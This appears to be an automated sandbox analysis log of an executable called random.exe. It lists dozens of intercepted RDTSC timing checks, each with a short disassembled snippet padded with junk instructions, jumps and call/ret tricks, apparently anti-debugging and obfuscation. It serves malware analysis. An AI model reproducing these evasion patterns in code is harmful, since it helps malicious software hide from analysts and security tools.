Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1032B13 second address: 1032B5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 nop 0x00000006 sub dword ptr [ebp+122D231Eh], esi 0x0000000c push 00000000h 0x0000000e pushad 0x0000000f call 00007F4C45470A86h 0x00000014 jmp 00007F4C45470A7Fh 0x00000019 pop ecx 0x0000001a xor cx, 78A4h 0x0000001f popad 0x00000020 push 00000000h 0x00000022 xor esi, dword ptr [ebp+122D2C47h] 0x00000028 xchg eax, ebx 0x00000029 push eax 0x0000002a push edx 0x0000002b push esi 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1032B5C second address: 1032B61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1032B61 second address: 1032B73 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 je 00007F4C45470A76h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1031CF2 second address: 1031CF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1034021 second address: 1034025 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1034025 second address: 1034040 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d jmp 00007F4C44C2BE2Bh 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10394C5 second address: 10394D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4C45470A80h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10394D9 second address: 10394DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 103A40F second address: 103A42F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a cmc 0x0000000b mov bl, C5h 0x0000000d push 00000000h 0x0000000f mov bx, 729Dh 0x00000013 push 00000000h 0x00000015 or dword ptr [ebp+122D39A8h], ebx 0x0000001b xchg eax, esi 0x0000001c pushad 0x0000001d push edi 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 103A42F second address: 103A43C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jnc 00007F4C44C2BE26h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 103A43C second address: 103A440 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1038566 second address: 103856A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 103856A second address: 10385DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push dword ptr fs:[00000000h] 0x0000000e push 00000000h 0x00000010 push eax 0x00000011 call 00007F4C45470A78h 0x00000016 pop eax 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b add dword ptr [esp+04h], 0000001Dh 0x00000023 inc eax 0x00000024 push eax 0x00000025 ret 0x00000026 pop eax 0x00000027 ret 0x00000028 mov dword ptr fs:[00000000h], esp 0x0000002f mov edi, dword ptr [ebp+122D2662h] 0x00000035 mov eax, dword ptr [ebp+122D0989h] 0x0000003b push 00000000h 0x0000003d push ebx 0x0000003e call 00007F4C45470A78h 0x00000043 pop ebx 0x00000044 mov dword ptr [esp+04h], ebx 0x00000048 add dword ptr [esp+04h], 00000014h 0x00000050 inc ebx 0x00000051 push ebx 0x00000052 ret 0x00000053 pop ebx 0x00000054 ret 0x00000055 and bx, BCF2h 0x0000005a push FFFFFFFFh 0x0000005c push eax 0x0000005d push eax 0x0000005e push edx 0x0000005f pushad 0x00000060 pushad 0x00000061 popad 0x00000062 push eax 0x00000063 push edx 0x00000064 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10385DB second address: 10385E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 103B1AD second address: 103B201 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C45470A80h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov ebx, dword ptr [ebp+122D2B77h] 0x00000012 push 00000000h 0x00000014 mov edi, dword ptr [ebp+122D2A2Fh] 0x0000001a push 00000000h 0x0000001c jmp 00007F4C45470A7Ch 0x00000021 push eax 0x00000022 jp 00007F4C45470AA8h 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F4C45470A88h 0x0000002f rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 103C1B1 second address: 103C1B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 103C1B5 second address: 103C1BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 103D367 second address: 103D36B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 103F108 second address: 103F132 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 ja 00007F4C45470A76h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F4C45470A87h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 103D36B second address: 103D371 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 103D371 second address: 103D398 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007F4C45470A85h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 jnp 00007F4C45470A76h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 104006D second address: 1040071 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1040071 second address: 1040075 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1040075 second address: 104007B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 104007B second address: 1040080 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1040080 second address: 10400A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4C44C2BE2Bh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f jnp 00007F4C44C2BE26h 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 pushad 0x00000019 pushad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 103F394 second address: 103F399 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10420E1 second address: 10420E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10420E5 second address: 1042111 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F4C45470A7Ah 0x0000000d push ecx 0x0000000e jmp 00007F4C45470A80h 0x00000013 pop ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 je 00007F4C45470A76h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 104278D second address: 1042791 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1042791 second address: 10427A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b jg 00007F4C45470A76h 0x00000011 pop esi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1044872 second address: 1044898 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C44C2BE33h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jo 00007F4C44C2BE28h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1044898 second address: 104489F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10469D5 second address: 10469F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4C44C2BE31h 0x00000009 popad 0x0000000a pop edx 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1042939 second address: 10429F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C45470A83h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push edi 0x0000000b pop edi 0x0000000c pop esi 0x0000000d popad 0x0000000e push eax 0x0000000f jmp 00007F4C45470A7Bh 0x00000014 nop 0x00000015 jnc 00007F4C45470A7Ch 0x0000001b push dword ptr fs:[00000000h] 0x00000022 push 00000000h 0x00000024 push ebx 0x00000025 call 00007F4C45470A78h 0x0000002a pop ebx 0x0000002b mov dword ptr [esp+04h], ebx 0x0000002f add dword ptr [esp+04h], 00000017h 0x00000037 inc ebx 0x00000038 push ebx 0x00000039 ret 0x0000003a pop ebx 0x0000003b ret 0x0000003c mov dword ptr fs:[00000000h], esp 0x00000043 push eax 0x00000044 pop ebx 0x00000045 mov eax, dword ptr [ebp+122D0F61h] 0x0000004b call 00007F4C45470A85h 0x00000050 add dword ptr [ebp+122D1FC7h], eax 0x00000056 pop ebx 0x00000057 push FFFFFFFFh 0x00000059 push 00000000h 0x0000005b push esi 0x0000005c call 00007F4C45470A78h 0x00000061 pop esi 0x00000062 mov dword ptr [esp+04h], esi 0x00000066 add dword ptr [esp+04h], 00000016h 0x0000006e inc esi 0x0000006f push esi 0x00000070 ret 0x00000071 pop esi 0x00000072 ret 0x00000073 push eax 0x00000074 pushad 0x00000075 push eax 0x00000076 push edx 0x00000077 jmp 00007F4C45470A7Fh 0x0000007c rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10429F2 second address: 1042A25 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C44C2BE38h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F4C44C2BE35h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1043A70 second address: 1043A75 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1047954 second address: 1047958 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1045AEA second address: 1045AEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1045AEE second address: 1045B00 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C44C2BE2Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1046AEC second address: 1046AF1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1046AF1 second address: 1046B12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F4C44C2BE33h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1046B12 second address: 1046B18 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1046B18 second address: 1046B1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1046B1E second address: 1046B22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 104DC72 second address: 104DC76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 104EF35 second address: 104EF86 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F4C45470A76h 0x00000008 jmp 00007F4C45470A85h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jo 00007F4C45470A8Ch 0x00000015 jmp 00007F4C45470A86h 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F4C45470A82h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 104EF86 second address: 104EF8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10528FB second address: 1052901 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1052153 second address: 105215E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F4C44C2BE26h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 105215E second address: 1052163 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1052163 second address: 105217B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop esi 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F4C44C2BE2Ah 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 105217B second address: 105217F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 105217F second address: 1052183 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1052183 second address: 1052189 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10522D1 second address: 10522D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1056C49 second address: 1056C6F instructions: 0x00000000 rdtsc 0x00000002 je 00007F4C45470A76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c jmp 00007F4C45470A7Dh 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 pushad 0x00000016 ja 00007F4C45470A7Ch 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1056C6F second address: 1056CAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4C44C2BE38h 0x00000009 popad 0x0000000a mov eax, dword ptr [eax] 0x0000000c js 00007F4C44C2BE36h 0x00000012 jmp 00007F4C44C2BE30h 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f push edi 0x00000020 pop edi 0x00000021 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1056CAE second address: 1056CB8 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F4C45470A76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1056D5E second address: 1056D76 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F4C44C2BE2Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f push edx 0x00000010 pop edx 0x00000011 pop esi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1056D76 second address: 1056D7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1056D7C second address: 1056D80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1056D80 second address: 1056D99 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C45470A7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f pushad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1056D99 second address: 1056DB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4C44C2BE37h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 105A248 second address: 105A255 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push edx 0x00000006 pop edx 0x00000007 pop edi 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 105A255 second address: 105A2A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F4C44C2BE37h 0x0000000e pushad 0x0000000f jmp 00007F4C44C2BE31h 0x00000014 js 00007F4C44C2BE26h 0x0000001a jmp 00007F4C44C2BE36h 0x0000001f push ecx 0x00000020 pop ecx 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 105DF3F second address: 105DF43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 105DF43 second address: 105DF4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 105DF4D second address: 105DF8F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F4C45470A84h 0x00000008 pushad 0x00000009 popad 0x0000000a pop ebx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push ecx 0x0000000e jmp 00007F4C45470A85h 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F4C45470A7Ch 0x0000001a push esi 0x0000001b pop esi 0x0000001c rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 105DF8F second address: 105DF93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 105E633 second address: 105E639 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 105E639 second address: 105E655 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop ecx 0x00000006 jl 00007F4C44C2BE4Ah 0x0000000c jne 00007F4C44C2BE2Ch 0x00000012 jc 00007F4C44C2BE26h 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 105E655 second address: 105E659 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 105EAED second address: 105EAF2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 105EAF2 second address: 105EAF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 105ED69 second address: 105ED6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 105EEE7 second address: 105EF07 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F4C45470A86h 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 105EF07 second address: 105EF0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 105EF0B second address: 105EF11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FE9143 second address: FE914F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jno 00007F4C44C2BE26h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FE914F second address: FE9158 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FE9158 second address: FE916F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007F4C44C2BE26h 0x0000000d jmp 00007F4C44C2BE2Ah 0x00000012 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 106A0DC second address: 106A0E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 106A0E8 second address: 106A0EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 106A227 second address: 106A24F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jg 00007F4C45470A76h 0x0000000e jmp 00007F4C45470A7Bh 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 pop edx 0x00000017 push edi 0x00000018 push eax 0x00000019 push edx 0x0000001a jg 00007F4C45470A76h 0x00000020 push ecx 0x00000021 pop ecx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 106A3A6 second address: 106A3AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 106A3AA second address: 106A3DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4C45470A7Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F4C45470A86h 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 jg 00007F4C45470A76h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 106A3DF second address: 106A3F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F4C44C2BE33h 0x0000000c rdtsc
